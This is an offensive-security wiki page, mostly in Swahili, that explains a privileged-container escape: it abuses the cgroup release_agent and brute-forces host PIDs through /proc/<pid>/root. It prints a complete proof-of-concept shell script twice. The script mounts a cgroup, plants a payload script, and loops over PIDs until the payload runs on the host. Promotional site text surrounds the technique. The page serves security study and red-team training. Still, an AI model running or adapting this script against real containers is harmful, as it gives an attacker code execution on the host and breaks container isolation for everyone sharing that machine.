release_agent exploit - Relative Paths to PIDs

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Kwa maelezo zaidi angalia blogu kutoka https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html. Hii ni muhtasari tu:

Mbinu hii inaelezea njia ya kutekeleza msimbo wa mwenyeji kutoka ndani ya kontena, ikishinda changamoto zinazotokana na usanidi wa dereva wa hifadhi ambao unaficha njia ya mfumo wa faili wa kontena kwenye mwenyeji, kama vile Kata Containers au mipangilio maalum ya devicemapper.

Hatua muhimu:

Kupata Vitambulisho vya Mchakato (PIDs): Kutumia kiungo cha simbology /proc/<pid>/root katika mfumo wa faili wa pseudo wa Linux, faili yoyote ndani ya kontena inaweza kufikiwa kulingana na mfumo wa faili wa mwenyeji. Hii inakwepa hitaji la kujua njia ya mfumo wa faili wa kontena kwenye mwenyeji.
Kuchambua PID: Njia ya nguvu ya kikatili inatumika kutafuta PIDs kwenye mwenyeji. Hii inafanywa kwa kuangalia kwa mpangilio uwepo wa faili maalum kwenye /proc/<pid>/root/<file>. Wakati faili inapopatikana, inaonyesha kwamba PID inayohusiana inahusiana na mchakato unaotembea ndani ya kontena lengwa.
Kuchochea Utekelezaji: Njia ya PID iliyokisiwa inaandikwa kwenye faili ya cgroups release_agent. Kitendo hiki kinachochea utekelezaji wa release_agent. Mafanikio ya hatua hii yanathibitishwa kwa kuangalia uundaji wa faili ya matokeo.

Mchakato wa Ukatili

Mchakato wa ukatili unajumuisha seti ya hatua za kina, ukilenga kutekeleza payload kwenye mwenyeji kwa kukisia PID sahihi ya mchakato unaotembea ndani ya kontena. Hapa kuna jinsi inavyoendelea:

Anzisha Mazingira: Skripti ya payload (payload.sh) inaandaliwa kwenye mwenyeji, na directory ya kipekee inaandaliwa kwa ajili ya usimamizi wa cgroup.
Andaa Payload: Skripti ya payload, ambayo ina amri zitakazotekelezwa kwenye mwenyeji, inaandikwa na kufanywa iweze kutekelezwa.
Weka Cgroup: Cgroup inawekwa na kusanidiwa. Bendera ya notify_on_release inawekwa ili kuhakikisha kwamba payload inatekelezwa wakati cgroup inachiliwa.
Kuchambua PID: Mzunguko unatembea kupitia PIDs zinazowezekana, kuandika kila PID iliyokisiwa kwenye faili ya release_agent. Hii inafanya skripti ya payload kuwa release_agent.
Kuchochea na Kuangalia Utekelezaji: Kwa kila PID, cgroup.procs ya cgroup inaandikwa, ikichochea utekelezaji wa release_agent ikiwa PID ni sahihi. Mzunguko unaendelea hadi matokeo ya skripti ya payload yapatikane, ikionyesha utekelezaji uliofanikiwa.

PoC kutoka kwenye blogu:

#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host<
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
if [ $((${TPID} % 100)) -eq 0 ]
then
echo "Checking pid ${TPID}"
if [ ${TPID} -gt ${MAX_PID} ]
then
echo "Exiting at ${MAX_PID} :-("
exit 1
fi
fi
# Set the release_agent path to the guessed pid
echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
# Trigger execution of the release_agent
sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousDocker Breakout / Privilege Escalation NextDocker release_agent cgroups escape

Last updated 4 months ago

#!/bin/sh OUTPUT_DIR="/" MAX_PID=65535 CGROUP_NAME="xyx" CGROUP_MOUNT="/tmp/cgrp" PAYLOAD_NAME="${CGROUP_NAME}_payload.sh" PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}" OUTPUT_NAME="${CGROUP_NAME}_payload.out" OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}" # Run a process for which we can search for (not needed in reality, but nice to have) sleep 10000 & # Prepare the payload script to execute on the host cat > ${PAYLOAD_PATH} << __EOF__ #!/bin/sh OUTPATH=\$(dirname \$0)/${OUTPUT_NAME} # Commands to run on the host< ps -eaf > \${OUTPATH} 2>&1 __EOF__ # Make the payload script executable chmod a+x ${PAYLOAD_PATH} # Set up the cgroup mount using the memory resource cgroup controller mkdir ${CGROUP_MOUNT} mount -t cgroup -o memory cgroup ${CGROUP_MOUNT} mkdir ${CGROUP_MOUNT}/${CGROUP_NAME} echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release # Brute force the host pid until the output path is created, or we run out of guesses TPID=1 while [ ! -f ${OUTPUT_PATH} ] do if [ $((${TPID} % 100)) -eq 0 ] then echo "Checking pid ${TPID}" if [ ${TPID} -gt ${MAX_PID} ] then echo "Exiting at ${MAX_PID} :-(" exit 1 fi fi # Set the release_agent path to the guessed pid echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent # Trigger execution of the release_agent sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" TPID=$((${TPID} + 1)) done # Wait for and cat the output sleep 1 echo "Done! Output:" cat ${OUTPUT_PATH}